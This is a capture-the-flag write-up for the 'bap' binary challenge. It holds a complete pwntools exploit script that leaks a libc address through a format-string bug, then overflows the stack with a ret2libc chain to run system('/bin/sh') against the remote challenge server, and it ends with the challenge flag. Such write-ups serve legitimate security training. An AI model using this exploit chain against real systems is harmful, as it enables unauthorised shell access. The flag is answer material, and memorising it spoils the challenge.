Bap
- Solves: TBD
- Score: 130
- Technique: Fmtstr, Ret2libc
bap bap bap
Script
from pwn import *
# Exploit client for the 'bap' challenge, in two stages: (1) a format-string
# read leaks a libc address, (2) a second input overflows the stack and runs a
# ret2libc chain. The two bug classes this relies on (see the technique list
# above) are a format string built from user input and a stack buffer overflow.
# From the payload layout the binary appears to have no stack canary and to be
# non-PIE (main's static address is reused as a return target) - inferred, not
# stated in the script. Any one of: passing user data as an argument to a
# fixed format string, -D_FORTIFY_SOURCE, stack protector, or PIE would break
# a step below.
elf = context.binary = ELF('./bap')   # target binary; context.binary also fixes arch/bits for asm() and p64()
libc = ELF('./libc.so.6')             # the libc shipped with the challenge; its symbol offsets drive the rebasing below
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
rop = ROP(libc)                       # gadget search runs over libc, not over the binary
r = remote('challs.actf.co', 31323)
# r = elf.process()
# r = gdb.debug('./bap', gdbscript='''b * 0x4011CC''')
# leak stack
# One-off recon loop, kept for reference: prints what each positional
# argument 0..29 resolves to so the right %N$p index can be chosen.
# for i in range(0,30):
# r = remote('challs.actf.co', 31323, level='error')
# # r = elf.process(level='error')
# r.sendline(b'AAAA %%%d$p' % i)
# print("%d - %s" % (i, r.recvuntil(b'\n').strip()))
# leak __libc_start_main + 133
fmtstr = b'%29$p'                     # prints the 29th positional argument; per the note above it is __libc_start_main+133
main = elf.symbols.main
ret = next(elf.search(asm('ret')))    # a bare `ret` gadget from the binary; presumably for 16-byte stack alignment before libc calls - not stated here
# Input 1: format string padded with '.' to 16 bytes, 8 filler bytes, then the
# saved return address is overwritten with ret -> main so the program runs a
# second time for the ROP stage. The 24-byte distance to the return address is
# implied by this layout (and by the second payload), not derived in the script;
# confirm against the binary if it changes.
leak = fmtstr + b'.' * (16 - len(fmtstr)) + b'A'*8 + p64(ret) + p64(main)
r.sendline(leak)
r.recvuntil(b': ')                    # consume the prompt text up to the formatted output
libc_leak = int(r.recvuntil(b'.',drop=True),16)   # the '.' padding that follows %29$p delimits the hex value
log.info(f"libc_leak: {hex(libc_leak)}")
# Undo the +133 noted above. The extra +5 is an empirical correction the script
# does not explain - re-check it if the libc build changes.
libc_leak = libc_leak - 133 + 5
libc.address = libc_leak - libc.symbols.__libc_start_main   # rebase libc from the known symbol offset
log.info(f"libc address: {hex(libc.address)}")
# ret2libc to spawn shell
pop_rdi = rop.find_gadget(['pop rdi', 'ret']).address + libc.address   # ROP(libc) above returned a libc-relative offset, hence the manual rebase
bin_sh = next(libc.search(b'/bin/sh'))   # absolute already: libc.address was set before this search
system = libc.symbols['system']          # likewise absolute after rebasing
# Input 2: same 24 bytes of filler, then ret / pop rdi ; "/bin/sh" / system /
# main - i.e. system("/bin/sh") with a return into main afterwards.
rop_payload = b'A'*24 + p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(system) + p64(main)
r.sendline(rop_payload)
r.interactive()
Flag
actf{baaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaap____}